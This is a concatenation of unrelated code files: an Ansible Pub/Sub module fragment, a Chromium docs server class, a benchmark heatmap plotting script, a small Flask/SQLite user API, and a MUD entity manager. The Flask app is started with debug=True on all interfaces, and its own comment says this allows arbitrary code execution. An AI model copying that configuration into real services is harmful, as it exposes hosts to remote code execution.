                t.delete()
                changed = True
    elif mod_params['state'] == 'present':
        if not t.exists():
            t.create()
            changed = True
        if s:
            if not s.exists():
                s.create()
                s.reload()
                changed = True
            else:
                # Subscription operations
                # TODO(supertom): if more 'update' operations arise, turn this into a function.
                s.reload()
                push_endpoint=mod_params['subscription'].get('push_endpoint', None)
                if push_endpoint is not None:
                    if push_endpoint != s.push_endpoint:
                        # The sentinel string "None" converts a push
                        # subscription back to pull.
                        if push_endpoint == 'None':
                            push_endpoint = None
                        s.modify_push_configuration(push_endpoint=push_endpoint)
                        s.reload()
                        changed = push_endpoint == s.push_endpoint
            if 'pull' in mod_params['subscription']:
                if s.push_endpoint is not None:
                    module.fail_json(msg="Cannot pull messages, push_endpoint is configured.")
                (json_output['pulled_messages'], changed) = pull_messages(
                    mod_params['subscription']['pull'], s)
    # publish messages to the topic
    if mod_params['publish'] and len(mod_params['publish']) > 0:
        changed = publish_messages(mod_params['publish'], t)
    json_output['changed'] = changed
    json_output.update(mod_params)
    module.exit_json(**json_output)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.gcp import *
# Run the module only when executed by Ansible, not on import.
if __name__ == '__main__':
    main()
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from fnmatch import fnmatch
import logging
import mimetypes
import traceback
import os
from api_data_source import APIDataSource
from api_list_data_source import APIListDataSource
from appengine_url_fetcher import AppEngineUrlFetcher
from appengine_wrappers import GetAppVersion, IsDevServer
from branch_utility import BranchUtility
from caching_file_system import CachingFileSystem
from compiled_file_system import CompiledFileSystem
from empty_dir_file_system import EmptyDirFileSystem
from example_zipper import ExampleZipper
from file_system import FileNotFoundError
from github_file_system import GithubFileSystem
from intro_data_source import IntroDataSource
from local_file_system import LocalFileSystem
from object_store_creator import ObjectStoreCreator
from offline_file_system import OfflineFileSystem
from path_canonicalizer import PathCanonicalizer
from reference_resolver import ReferenceResolver
from samples_data_source import SamplesDataSource
from sidenav_data_source import SidenavDataSource
from subversion_file_system import SubversionFileSystem
import svn_constants
from template_data_source import TemplateDataSource
from test_object_store import TestObjectStore
from third_party.json_schema_compiler.model import UnixName
import url_constants
class ServerInstance(object):
  """Wires together the data-source factories, file systems and caches that
  serve one channel of the extensions docs server.

  Construction order matters: the API data source factory is created first,
  then given its reference-resolver and samples factories via setters.
  """
  def __init__(self,
               channel,
               object_store_creator,
               host_file_system,
               app_samples_file_system,
               static_path,
               compiled_fs_factory):
    self.channel = channel
    self.object_store_creator = object_store_creator
    self.host_file_system = host_file_system
    self.app_samples_file_system = app_samples_file_system
    self.compiled_host_fs_factory = compiled_fs_factory
    self.api_list_data_source_factory = APIListDataSource.Factory(
        self.compiled_host_fs_factory,
        svn_constants.API_PATH,
        svn_constants.PUBLIC_TEMPLATE_PATH)
    self.api_data_source_factory = APIDataSource.Factory(
        self.compiled_host_fs_factory,
        svn_constants.API_PATH)
    # Reference resolution needs both API data sources; wired back into the
    # API data source factory below.
    self.ref_resolver_factory = ReferenceResolver.Factory(
        self.api_data_source_factory,
        self.api_list_data_source_factory,
        object_store_creator)
    self.api_data_source_factory.SetReferenceResolverFactory(
        self.ref_resolver_factory)
    # Note: samples are super slow in the dev server because it doesn't support
    # async fetch, so disable them.
    if IsDevServer():
      extension_samples_fs = EmptyDirFileSystem()
    else:
      extension_samples_fs = self.host_file_system
    self.samples_data_source_factory = SamplesDataSource.Factory(
        channel,
        extension_samples_fs,
        CompiledFileSystem.Factory(extension_samples_fs, object_store_creator),
        self.app_samples_file_system,
        CompiledFileSystem.Factory(self.app_samples_file_system,
                                   object_store_creator),
        self.ref_resolver_factory,
        svn_constants.EXAMPLES_PATH)
    self.api_data_source_factory.SetSamplesDataSourceFactory(
        self.samples_data_source_factory)
    self.intro_data_source_factory = IntroDataSource.Factory(
        self.compiled_host_fs_factory,
        self.ref_resolver_factory,
        [svn_constants.INTRO_PATH, svn_constants.ARTICLE_PATH])
    self.sidenav_data_source_factory = SidenavDataSource.Factory(
        self.compiled_host_fs_factory,
        svn_constants.JSON_PATH)
    # Template rendering aggregates every data source created above.
    self.template_data_source_factory = TemplateDataSource.Factory(
        channel,
        self.api_data_source_factory,
        self.api_list_data_source_factory,
        self.intro_data_source_factory,
        self.samples_data_source_factory,
        self.sidenav_data_source_factory,
        self.compiled_host_fs_factory,
        self.ref_resolver_factory,
        svn_constants.PUBLIC_TEMPLATE_PATH,
        svn_constants.PRIVATE_TEMPLATE_PATH,
        static_path)
    self.example_zipper = ExampleZipper(
        self.compiled_host_fs_factory,
        svn_constants.DOCS_PATH)
    self.path_canonicalizer = PathCanonicalizer(
        channel,
        self.compiled_host_fs_factory)
    self.content_cache = self.compiled_host_fs_factory.CreateIdentity(
        ServerInstance)
  @staticmethod
  def ForTest(file_system):
    # Minimal instance for unit tests: empty app samples, test object stores.
    object_store_creator = ObjectStoreCreator.ForTest()
    return ServerInstance('test',
                          object_store_creator,
                          file_system,
                          EmptyDirFileSystem(),
                          '/static',
                          CompiledFileSystem.Factory(file_system,
                                                     object_store_creator))
  @staticmethod
  def ForLocal():
    # Instance backed by the local checkout (trunk) for local development.
    channel = 'trunk'
    object_store_creator = ObjectStoreCreator(channel,
                                              start_empty=False,
                                              store_type=TestObjectStore)
    file_system = CachingFileSystem(LocalFileSystem.Create(),
                                    object_store_creator)
    return ServerInstance(
        channel,
        object_store_creator,
        file_system,
        EmptyDirFileSystem(),
        '/static',
        CompiledFileSystem.Factory(file_system, object_store_creator))
|
import os
import glob
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib as mpl
import matplotlib.pyplot as plt
# Use Arial (sans-serif) for all matplotlib text in the generated figures.
mpl.rcParams['font.family'] = "sans-serif"
mpl.rcParams['font.sans-serif'] = "Arial"
import modules.read_process_data as data_reader
import modules.plot_heatmap as heatmap_maker
import modules.plot_scatterplots as scatterplot_maker
def avg_aggregation(dataset, task_name, file_paths, all_lookup):
    """Average the per-trial metric CSVs by chunk shape and save the result.

    Reads every CSV in *file_paths*, concatenates them, averages the numeric
    columns per unique 'time x lon x lat' chunking, rebuilds the helper
    columns that mean() drops, writes the result to
    ../data/<dataset>/performance_data/<task_name>.csv and returns it.
    """
    frames = []
    for path in file_paths:
        frame = data_reader.read_process_csv(path, timeall=all_lookup['timeall'],
                                             lonall=all_lookup['lonall'], latall=all_lookup['latall'],
                                             sort_by='lonlat')
        frame["path_name"] = os.path.basename(path)
        frames.append(frame)
    combined = pd.concat(frames)
    # One averaged row per unique chunking.
    per_chunk_means = [group.mean() for _, group in combined.groupby("time x lon x lat")]
    mean_df = pd.DataFrame(per_chunk_means)
    # Rebuild the string/product helper columns lost by mean().
    mean_df['lon x lat'] = [f'{int(lon)}x{int(lat)}' for lon, lat in zip(mean_df.lon_chunks, mean_df.lat_chunks)]
    mean_df['lonlat_product'] = [lon * lat for lon, lat in zip(mean_df.lon_chunks, mean_df.lat_chunks)]
    mean_df = mean_df.sort_values(by='lonlat_product')
    mean_df.time_chunks = mean_df.time_chunks.astype(int)
    mean_df.to_csv(f'../data/{dataset}/performance_data/{task_name}.csv')
    return mean_df
def make_heatmap(
    dataset,
    titles_dict,
    filepath,
    all_lookup,
    KEY,
    metrics_df=None,
    metrics_df_2=None,
    task_name=None,
    TRANSPOSE=False,
    VMIN=None,
    VMAX=None,
    QUANTILE_Q=0.65,
    NUM_DECIMALS=3,
    MB_TO_GB=True,
    SHOW_TITLE=True,
    PROCESS_CSV=True,
    PRODUCT=False
):
    """Build pivot tables for metric *KEY* and render them as a heatmap.

    When PROCESS_CSV is True the metrics are loaded from *filepath* and the
    task name is derived from the file stem; otherwise the caller supplies
    metrics_df (and optionally metrics_df_2) plus task_name directly.
    """
    if PROCESS_CSV:
        metrics_df = data_reader.read_process_csv(
            filepath,
            timeall=all_lookup['timeall'],
            lonall=all_lookup['lonall'],
            latall=all_lookup['latall'],
            sort_by='lonlat'
        )
        # "<name>_ntrialsN.csv" -> "<name>" (drop extension and last "_" part).
        stem = filepath.split('/')[-1].split('.')[0]
        task_name = '_'.join(stem.split('_')[:-1])
    pivots = heatmap_maker.make_pivot_tables(
        metrics_df_1=metrics_df,
        metrics_df_2=metrics_df_2,
        column_name=KEY,
        convert_mb_to_gb=MB_TO_GB,
        product=PRODUCT
    )
    sns.set(font_scale=1.5)
    heatmap_maker.make_heatmap(
        dataset,
        titles_dict,
        pivots,
        KEY,
        task_name,
        transpose=TRANSPOSE,
        vmin=VMIN,
        vmax=VMAX,
        quantile_q=QUANTILE_Q,
        fontsize=10,
        num_decimals=NUM_DECIMALS,
        convert_mb_to_gb=MB_TO_GB,
        show_title=SHOW_TITLE
    )
def organize_df(df):
    """Normalise chunk columns to int, add label/product columns, then sort
    by lon*lat product and drop duplicate chunkings (keeping the first)."""
    for col in ('time_chunks', 'lon_chunks', 'lat_chunks'):
        df[col] = df[col].astype(int)
    # Label and product columns derived from the chunk counts.
    df['lon x lat'] = df['lon_chunks'].astype(str) + 'x' + df['lat_chunks'].astype(str)
    df['lonlat_product'] = df['lon_chunks'] * df['lat_chunks']
    df['time x lon x lat'] = (df['time_chunks'].astype(str) + 'x' +
                              df['lon_chunks'].astype(str) + 'x' +
                              df['lat_chunks'].astype(str))
    df['total_product'] = df['time_chunks'] * df['lon_chunks'] * df['lat_chunks']
    df = df.sort_values(by='lonlat_product')
    df.drop_duplicates(subset='time x lon x lat', keep='first', inplace=True)
    return df
def main():
    """Generate all performance heatmaps and scatterplots for one dataset.

    Reads the benchmark CSVs under ../data/<dataset>/performance_data/ and
    writes figures via heatmap_maker / scatterplot_maker. Assumes that
    directory layout exists relative to the working directory.
    """
    ntrials = 1
    dataset = 'geos-fp-global_inst'
    # Lookup dictionaries
    titles_dict = {
        "chunk_sizes": "Chunk size [B]",
        "num_chunks": "Number of chunks",
        "peak_memories": "Peak memory [GB]",
        "cpu_times": "CPU time [Sec]",
        "norm_cpu_times": "Processing speed [Num data points per sec]",
        "norm_peak_memories": "Peak memory per data point [MiB]",
        "runtime_hr": "Rechunking time [Hr]",
        "archive_size": "Archive size [GB]"
    }
    # Full (unchunked) dimension sizes per dataset.
    convert_all_dict = {
        'geos-fp-global_inst': {'timeall': 5136, 'lonall': 1152, 'latall': 721}
    }
    all_lookup = convert_all_dict[dataset]
    task_dict = {
        0: f'time_series_metrics_ntrials{ntrials}',
        1: f'map_one_timestep_metrics_ntrials{ntrials}'
    }
    keys = ['norm_cpu_times', 'norm_peak_memories', 'cpu_times', 'peak_memories']
    pairwise_combinations = [
        ('chunk_sizes', 'cpu_times'),
        ('chunk_sizes', 'peak_memories'),
        ('peak_memories', 'cpu_times'),
    ]
    norm_pairwise_combinations = [
        ('chunk_sizes', 'norm_cpu_times'),
        ('chunk_sizes', 'norm_peak_memories'),
        ('norm_peak_memories', 'norm_cpu_times'),
    ]
    # Plot time series data
    print('Plotting time series data...')
    filepath = f'../data/{dataset}/performance_data/{task_dict[0]}.csv'
    for k in keys:
        make_heatmap(
            dataset,
            titles_dict,
            filepath,
            all_lookup,
            KEY=k
        )
    # Plot map data
    print('Plotting map data...')
    filepath = f'../data/{dataset}/performance_data/{task_dict[1]}.csv'
    for k in keys:
        make_heatmap(
            dataset,
            titles_dict,
            filepath,
            all_lookup,
            KEY=k
        )
    # Plot product/avg of both operations' data
    print('Plotting product of both operations...')
    # Product of time series and map df's
    time_filepath = f'../data/{dataset}/performance_data/{task_dict[0]}.csv'
    map_filepath = f'../data/{dataset}/performance_data/{task_dict[1]}.csv'
    time_metrics_df = data_reader.read_process_csv(time_filepath, timeall=all_lookup['timeall'],
                                                   lonall=all_lookup['lonall'], latall=all_lookup['latall'],
                                                   sort_by='lonlat')
    map_metrics_df = data_reader.read_process_csv(map_filepath, timeall=all_lookup['timeall'],
                                                  lonall=all_lookup['lonall'], latall=all_lookup['latall'],
                                                  sort_by='lonlat')
    # Normalized metrics are averaged; raw metrics are multiplied.
    for k in keys:
        make_heatmap(
            dataset,
            titles_dict,
            time_filepath,
            all_lookup,
            KEY=k,
            metrics_df=time_metrics_df,
            metrics_df_2=map_metrics_df,
            task_name='average' if 'norm' in k else 'product',
            PROCESS_CSV=False,
            PRODUCT=False if 'norm' in k else True
        )
    # Plot time series aggregation data
    print('Plotting time series aggregation data...')
    file_paths = np.sort(glob.glob(f'../data/{dataset}/performance_data/time_series_over_region_*_ntrials{ntrials}.*'))
    task_name = 'time_series_average'
    mean_df = avg_aggregation(dataset, task_name, file_paths, all_lookup)
    for k in keys:
        make_heatmap(
            dataset,
            titles_dict,
            '',
            all_lookup,
            KEY=k,
            metrics_df=mean_df,
            task_name=task_name,
            QUANTILE_Q=0.7,
            NUM_DECIMALS=3,
            PROCESS_CSV=False
        )
    # Plot map aggregation data
    print('Plotting map aggregation data...')
    file_paths = np.sort(glob.glob(f'../data/{dataset}/performance_data/map_over_time_*_ntrials{ntrials}.*'))
    task_name = 'maps_average'
    mean_df = avg_aggregation(dataset, task_name, file_paths, all_lookup)
    for k in keys:
        make_heatmap(
            dataset,
            titles_dict,
            '',
            all_lookup,
            KEY=k,
            metrics_df=mean_df,
            task_name=task_name,
            QUANTILE_Q=0.7,
            NUM_DECIMALS=3,
            PROCESS_CSV=False
        )
    # Plot product/avg of both operations' data aggregations
    print('Plotting product of both aggregation operations...')
    # Product of time series and map df's
    time_filepath = f'../data/{dataset}/performance_data/time_series_average.csv'
    map_filepath = f'../data/{dataset}/performance_data/maps_average.csv'
    time_metrics_df = data_reader.read_process_csv(time_filepath, timeall=all_lookup['timeall'],
                                                   lonall=all_lookup['lonall'], latall=all_lookup['latall'],
                                                   sort_by='lonlat')
    map_metrics_df = data_reader.read_process_csv(map_filepath, timeall=all_lookup['timeall'],
                                                  lonall=all_lookup['lonall'], latall=all_lookup['latall'],
                                                  sort_by='lonlat')
    for k in keys:
        make_heatmap(
            dataset,
            titles_dict,
            time_filepath,
            all_lookup,
            KEY=k,
            metrics_df=time_metrics_df,
            metrics_df_2=map_metrics_df,
            task_name='average_aggregate' if 'norm' in k else 'product_aggregate',
            PROCESS_CSV=False,
            PRODUCT=False if 'norm' in k else True
        )
    # Plot rechunking time
    print('Plotting rechunking time...')
    filepath = f'../data/{dataset}/performance_data/rechunking_time.csv'
    df = pd.read_csv(filepath)
    df = df.drop_duplicates(['time_chunks', 'lon_chunks', 'lat_chunks'], keep='last')
    # 999 is the sentinel for "whole dimension"; replace with the true sizes.
    df['time_chunks']= df['time_chunks'].replace(999, 5136)
    df['lon_chunks'] = df['lon_chunks'].replace(999, 1152)
    df['lat_chunks'] = df['lat_chunks'].replace(999, 721)
    df = organize_df(df)
    task_name = 'rechunking'
    make_heatmap(
        dataset,
        titles_dict,
        filepath,
        all_lookup,
        KEY='runtime_hr',
        metrics_df=df,
        task_name=task_name,
        QUANTILE_Q=0.82,
        PROCESS_CSV=False
    )
    # Plot archive size
    print('Plotting archive size...')
    filepath = f'../data/{dataset}/performance_data/archive_sizes.csv'
    df = pd.read_csv(filepath)
    # Bytes -> GB.
    df['archive_size'] = df['archive_size'] * 1e-9
    # 'all' is this file's sentinel for "whole dimension".
    df['time_chunks'].replace('all', 5136, inplace=True)
    df['lon_chunks'].replace('all', 1152, inplace=True)
    df['lat_chunks'].replace('all', 721, inplace=True)
    df = organize_df(df)
    task_name = 'archive_size'
    make_heatmap(
        dataset,
        titles_dict,
        filepath,
        all_lookup,
        KEY='archive_size',
        metrics_df=df,
        task_name=task_name,
        QUANTILE_Q=None,
        PROCESS_CSV=False
    )
    # Plot scatterplots
    print('Plotting scatterplots...')
    LOG = True
    NORMS = [False, True]
    task_name = 'overlay_tasks'
    task_dict = {
        0: f'time_series_metrics_ntrials{ntrials}',
        1: f'map_one_timestep_metrics_ntrials{ntrials}'
    }
    filepath = f'../data/{dataset}/performance_data/{task_dict[0]}.csv'
    map_filepath = f'../data/{dataset}/performance_data/{task_dict[1]}.csv'
    metrics_df = data_reader.read_process_csv(filepath, timeall=all_lookup['timeall'],
                                              lonall=all_lookup['lonall'], latall=all_lookup['latall'],
                                              sort_by='lonlat')
    map_metrics_df = data_reader.read_process_csv(map_filepath, timeall=all_lookup['timeall'],
                                                  lonall=all_lookup['lonall'], latall=all_lookup['latall'],
                                                  sort_by='lonlat')
    concatenated = pd.concat([metrics_df.assign(dataset='set1'), map_metrics_df.assign(dataset='set2')])
    # One colour per lon*lat product, sampled from the inferno_r colormap.
    num_colors = len(metrics_df['lonlat_product'].unique())
    color_palette = sns.color_palette("inferno_r", as_cmap=True, n_colors=num_colors)
    color_palette = color_palette(np.linspace(0.1, 1, num_colors))
    color_palette = sns.color_palette(color_palette)
    for NORM in NORMS:
        pairs = norm_pairwise_combinations if NORM else pairwise_combinations
        # Hand-tuned axis limits for the raw (lim1) and normalized (lim2) plots.
        lim1 = [(10**-2, 10**2.3), (10**2, 4.5*(10**3)), (10**-2, 10**2.3)]
        lim2 = [(10**1.5, 10**7.8), (10**-4, 10**0.2), (10**1.4, 10**8)]
        YLIM = lim2 if NORM else lim1
        fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(9,3), constrained_layout=True, dpi=150)
        for ax_i, (ax, pair) in enumerate(zip(axes.flatten(), pairs)):
            scatterplot_maker.plot_pairwise_metrics(ax, concatenated, pair[0], pair[1],
                                                    color_palette, titles_dict,
                                                    log=LOG, legend=False, fontsize=12,
                                                    plot_lines=True, ylim=YLIM[ax_i])
        label = '_norm' if NORM else ''
        if LOG:
            plt.savefig(f'../data/{dataset}/scatterplots/{task_name}_log{label}.png', bbox_inches='tight')
        else:
            plt.savefig(f'../data/{dataset}/scatterplots/{task_name}{label}.png', bbox_inches='tight')
# Run only when executed as a script, not on import.
if __name__ == '__main__':
    main()
<reponame>Ritik19/Cloud-Computing-Project
from flask import Flask, jsonify, request, abort
from flask import Response
import sqlite3
import requests
import hashlib
import json
from flask_cors import CORS
import base64
import datetime
import string
import re
app = Flask(__name__)
CORS(app)
app.config["CORS_SUPPORTS_CREDENTIALS"] = True
count=0
def checkUserNameInDb(username):
    """Return 1 when no row in User matches `username`, otherwise 0."""
    db = sqlite3.connect("user_databs.db")
    cur = db.cursor()
    cur.execute("SELECT * from User WHERE username = ?", (username,))
    rows = cur.fetchall()
    db.close()
    return 1 if not rows else 0
def checkCategoryInDb(categoryname):
    """Return 1 when `categoryname` is absent from the Category table, else 0."""
    db = sqlite3.connect("user_databs.db")
    cur = db.cursor()
    cur.execute("SELECT * from Category WHERE categoryname = ?", (categoryname,))
    missing = len(cur.fetchall()) == 0
    db.close()
    return 1 if missing else 0
def getcategory(categorydic):
    """Fill `categorydic` with first-column -> second-column pairs from
    Category and return it.

    (Presumably id -> name; the table schema is not visible here -- confirm.)
    """
    db = sqlite3.connect("user_databs.db")
    cur = db.cursor()
    cur.execute("SELECT * from Category")
    for row in cur.fetchall():
        categorydic[row[0]] = row[1]
    db.commit()  # no-op for a read; kept to match the original behavior
    db.close()
    return categorydic
def checkactid(actid):
    """Return 1 when no Acts row has actId == `actid`, else 0."""
    db = sqlite3.connect("user_databs.db")
    cur = db.cursor()
    cur.execute("SELECT * from Acts WHERE actId = ?", (actid,))
    rows = cur.fetchall()
    db.close()
    return 1 if not rows else 0
def checkusername(user):
    """Return 1 when `user` exists in the User table, 0 otherwise.

    Inverse polarity of checkUserNameInDb, which returns 1 on absence.
    """
    db = sqlite3.connect("user_databs.db")
    cur = db.cursor()
    cur.execute("SELECT username FROM User WHERE username=?", (user,))
    found = bool(cur.fetchall())
    db.close()
    return 1 if found else 0
def checkcategoryname(category):
    """Return 1 when `category` exists in the Category table, 0 otherwise."""
    db = sqlite3.connect("user_databs.db")
    cur = db.cursor()
    cur.execute("SELECT categoryname from Category where categoryname=?", (category,))
    found = bool(cur.fetchall())
    db.close()
    return 1 if found else 0
def imgB64decode(imgB64):
    """Return 1 if `imgB64` is valid base64 (round-trips exactly), else 0.

    Fixes two defects in the original: the round-trip comparison result was
    discarded (the line had no effect), and it compared bytes against str,
    which is always False anyway. The comparison is now enforced, with the
    input encoded to bytes first so the types match.
    """
    try:
        raw = imgB64.encode() if isinstance(imgB64, str) else imgB64
        if base64.b64encode(base64.b64decode(raw)) == raw:
            return 1
        return 0
    except Exception:
        # Any decode failure (bad padding, non-base64 bytes) means invalid.
        return 0
def imgB64decodes(category):
    """Return 0 if every imgB64 stored for `category` is valid base64, else 1.

    Note the inverted polarity versus imgB64decode: here 0 means valid.
    Fixes the original's Python-2 ``str.decode('base64', 'strict')`` call,
    which was also applied to the fetchall() *list* rather than to each
    value -- it always raised, so the function always returned 1.
    """
    try:
        connectionState = sqlite3.connect('user_databs.db')
        cursor = connectionState.cursor()
        cursor.execute('SELECT imgB64 from Acts where categoryname=?', (category,))
        rows = cursor.fetchall()
        connectionState.close()
        for (img,) in rows:
            raw = img.encode() if isinstance(img, str) else img
            base64.b64decode(raw)
    except Exception:
        return 1
    else:
        return 0
def timecheck(timeformat):
    """Return 1 if `timeformat` matches '%d-%m-%Y:%S-%M-%H', else 0."""
    try:
        datetime.datetime.strptime(timeformat, '%d-%m-%Y:%S-%M-%H')
    except (ValueError, TypeError):
        # Narrowed from a bare except: only parse/type failures mean
        # "invalid"; anything else (e.g. KeyboardInterrupt) propagates.
        return 0
    else:
        return 1
def timechecks(category):
    """Return 1 if every timestamp stored for `category` parses, else 0.

    Fixes two defects: the database filename typo ('databse.db' where every
    other helper uses 'user_databs.db'), and strptime being called on the
    fetchall() *list*, which always raised so the function always returned 0.
    """
    try:
        connectionState = sqlite3.connect('user_databs.db')
        cursor = connectionState.cursor()
        cursor.execute('SELECT timestamp from Acts where categoryname=?', (category,))
        rows = cursor.fetchall()
        connectionState.close()
        for (stamp,) in rows:
            # NOTE(review): the original used '%d-%m-%Y' here while
            # timecheck() validates '%d-%m-%Y:%S-%M-%H' on input --
            # confirm which format timestamps are actually stored in.
            datetime.datetime.strptime(stamp, '%d-%m-%Y')
    except Exception:
        return 0
    else:
        return 1
def checkCategory(category):
    """Return 1 when `category` is not in the Category table, else 0.

    Duplicate of checkCategoryInDb, kept for compatibility with callers.
    """
    db = sqlite3.connect('user_databs.db')
    cur = db.cursor()
    cur.execute('SELECT * FROM Category where categoryname=?', (category,))
    missing = len(cur.fetchall()) == 0
    db.close()
    return 1 if missing else 0
def checknoofacts(category):
    """Return 0 while fewer than 100 matching rows exist, else 1.

    NOTE(review): despite the name, this counts rows in Category, not Acts --
    presumably a per-category act limit was intended; confirm with callers.
    """
    db = sqlite3.connect('user_databs.db')
    cur = db.cursor()
    cur.execute("SELECT * FROM Category WHERE categoryname=?", (category,))
    rows = cur.fetchall()
    db.close()
    return 0 if len(rows) < 100 else 1
def checkacts(category, end):
    """Return 0 if at least `end` acts exist for `category`, else 1.

    Fix: the sqlite connection was never closed, leaking a file handle on
    every call.
    """
    connectionState = sqlite3.connect('user_databs.db')
    cursor = connectionState.cursor()
    cursor.execute('SELECT * from Acts where categoryname=?', (category,))
    actno = cursor.fetchall()
    connectionState.close()
    if len(actno) >= end:
        return 0
    return 1
def checkacts1(category, end):
    """Return 1 if at least `end` acts exist for `category`, else 0.

    Inverse polarity of checkacts. Fix: the sqlite connection was never
    closed, leaking a file handle on every call.
    """
    connectionState = sqlite3.connect('user_databs.db')
    cursor = connectionState.cursor()
    cursor.execute('SELECT * FROM Acts where categoryname=?', (category,))
    actno = cursor.fetchall()
    connectionState.close()
    if len(actno) >= end:
        return 1
    return 0
def checkUserPwd(username, password):
    """Return 1 when no User row matches (username, password), else 0.

    Fixes: the query targeted table 'Users' while every other helper in this
    module uses 'User' (so the query raised OperationalError), and the sqlite
    connection was never closed.
    """
    connectionState = sqlite3.connect('user_databs.db')
    cursor = connectionState.cursor()
    cursor.execute('SELECT username,password from User where username=? and password=?',
                   (username, password))
    userpwd = cursor.fetchall()
    connectionState.close()
    if len(userpwd) == 0:
        return 1
    return 0
def checkforimg(imgB64):
    """Return 1 when no Acts row stores `imgB64`, else 0.

    Fix: the sqlite connection was never closed, leaking a file handle on
    every call.
    """
    connectionState = sqlite3.connect('user_databs.db')
    cursor = connectionState.cursor()
    cursor.execute('SELECT * from Acts where imgB64=?', (imgB64,))
    imgdata = cursor.fetchall()
    connectionState.close()
    if len(imgdata) == 0:
        return 1
    return 0
def checkforhash(maybe_sha):
    """Return True if `maybe_sha` looks like a SHA-1 hex digest (40 hex chars).

    Fix: removed an sqlite connection that was opened on every call but
    never used and never closed (pure resource leak -- this function does
    no database work).
    """
    if len(maybe_sha) != 40:
        return False
    try:
        int(maybe_sha, 16)
    except ValueError:
        # Not a hexadecimal string.
        return False
    return True
#1.ADDING USER AND LIST ALL USERS
@app.route("/api/v1/users", methods=['POST', 'GET', 'DELETE', 'PUT'])
def addUser():
    """POST: create a user; GET: list all usernames; anything else: 405.

    POST expects JSON ``{"username": ..., "password": ...}`` where the
    password is already a SHA-1 hex digest (validated by checkforhash).
    Returns 201 on success, 400 on a duplicate username or malformed hash.
    Every request bumps the module-global `count` used by /_count.

    Cleanup: removed unused locals (userpass, dic), blocks of commented-out
    code, and a pointless commit() after a SELECT; behavior is unchanged.
    """
    global count
    if request.method == "POST":
        count = count + 1
        user_data = request.get_json()
        # Username must be unused and the password a 40-char hex hash.
        if checkUserNameInDb(user_data['username']) and checkforhash(user_data['password']):
            connectionState = sqlite3.connect("user_databs.db")
            cursor = connectionState.cursor()
            cursor.execute("INSERT INTO User(username, password) VALUES(?,?)",
                           (user_data['username'], user_data['password']))
            connectionState.commit()
            connectionState.close()
            return jsonify({}), 201
        # Bad request.
        return jsonify({}), 400
    elif request.method == "GET":
        count = count + 1
        connectionState = sqlite3.connect("user_databs.db")
        cursor = connectionState.cursor()
        cursor.execute("SELECT username from User")
        users = [row[0] for row in cursor.fetchall()]
        connectionState.close()
        return jsonify(users), 200
    else:
        count = count + 1
        # Method not allowed (DELETE/PUT are routed here but unsupported).
        return jsonify({}), 405
#2.DELETE USER
@app.route("/api/v1/users/<username>", methods=['POST', 'GET', 'DELETE', 'PUT'])
def removeUser(username):
    """DELETE: remove `username` from the User table; anything else: 405.

    Returns 400 when the username does not exist, 200 on successful delete.
    Every request bumps the module-global `count` used by /_count.

    Cleanup: removed commented-out dead code; the count increment is hoisted
    (the original incremented identically in both branches).
    """
    global count
    count = count + 1
    if request.method == "DELETE":
        # checkUserNameInDb returns 1 (truthy) when the user is absent.
        if checkUserNameInDb(username):
            return jsonify({}), 400
        connectionState = sqlite3.connect("user_databs.db")
        cursor = connectionState.cursor()
        cursor.execute("DELETE FROM User where username=?", (username,))
        connectionState.commit()
        connectionState.close()
        return jsonify({}), 200
    return jsonify({}), 405
#3. Number of HTTP requests and reset the number http requests
@app.route('/api/v1/_count', methods=['GET', 'DELETE', 'POST', 'PUT'])
def regcount():
    """GET: report the HTTP request counter; DELETE: reset it; else 405.

    Fix: both branches opened (and closed) an sqlite connection that was
    never used -- the counter lives only in the module-global `count`, so
    the database round-trip has been removed.

    NOTE(review): unlike the other routes, this handler does not increment
    `count` itself -- presumably _count requests are deliberately excluded
    from the tally; confirm against the spec.
    """
    global count
    if request.method == 'GET':
        return jsonify([count]), 200
    elif request.method == 'DELETE':
        count = 0
        return jsonify({}), 200
    else:
        return jsonify({}), 405
#@app.route("/api/v1/users/cats/<name>", methods = ['POST', 'GET','DELETE','PUT'])
#def cat(name):
# r=requests.post('http://localhost:8000/api/v1/categories',data=name)
# Entry point: serve the API on all interfaces, port 80.
# NOTE(review): debug=True enables the Werkzeug debugger, which allows
# arbitrary code execution -- must not be used in production; confirm
# this is a development-only configuration.
if __name__ == '__main__':
    app.run(host='0.0.0.0',port = 80, debug = True)
|
# -*- coding: utf-8 -*-
"""Entities, the base of all complex MUD objects."""
# Part of Clockwork MUD Server (https://github.com/whutch/cwmud)
# :copyright: (c) 2008 - 2017 <NAME>
# :license: MIT (https://github.com/whutch/cwmud/blob/master/LICENSE.txt)
from copy import deepcopy
from weakref import WeakValueDictionary
from pylru import lrucache
from .attributes import Attribute, DataBlob, Unset
from .json import JSONStore
from .logs import get_logger
from .storage import STORES
from .timing import TIMERS
from .utils import class_name, int_to_base_n, joins
from .utils.exceptions import AlreadyExists
from .utils.mixins import (HasFlags, HasFlagsMeta, HasTags,
HasWeaks, HasWeaksMeta)
log = get_logger("entities")
# Do NOT change these after your server has started generating UIDs or you
# risk running into streaks of duplicate UIDs.
_uid_timecode_multiplier = 10000
_uid_timecode_charset = ("0123456789aAbBcCdDeEfFgGhHijJkKLmM"
"nNopPqQrRstTuUvVwWxXyYzZ")
# I left out "I", "l", "O", and "S" to make time codes easier to distinguish
# regardless of font. If my base 58 math is to be believed, this character set
# should generate eight-digit time codes with 100 microsecond precision until
# October 25th, 2375, and then nine-digit codes well into the 26th millennium.
class EntityManager:
    """A manager for entity types."""

    def __init__(self):
        """Create a new entity manager."""
        self._entities = {}

    def __contains__(self, name):
        return name in self._entities

    def __getitem__(self, name):
        return self._entities[name]

    def register(self, entity):
        """Register an entity type, usable as a class decorator.

        :param Entity entity: The entity class to register
        :returns Entity: The same class, unchanged
        :raises AlreadyExists: If a class with that name is already registered
        :raises TypeError: If `entity` is not an Entity subclass
        """
        if not (isinstance(entity, type) and issubclass(entity, Entity)):
            raise TypeError("must be subclass of Entity to register")
        key = entity.__name__
        if key in self._entities:
            raise AlreadyExists(key, self._entities[key], entity)
        self._entities[key] = entity
        return entity

    def save(self):
        """Save the dirty instances of all registered entities."""
        saved = 0
        for entity_type in self._entities.values():
            dirty = (inst for inst in entity_type._instances.values()
                     if inst.is_savable and inst.is_dirty)
            for instance in dirty:
                instance.save()
                saved += 1
        if saved:
            log.debug("Saved %s dirty entities.", saved)
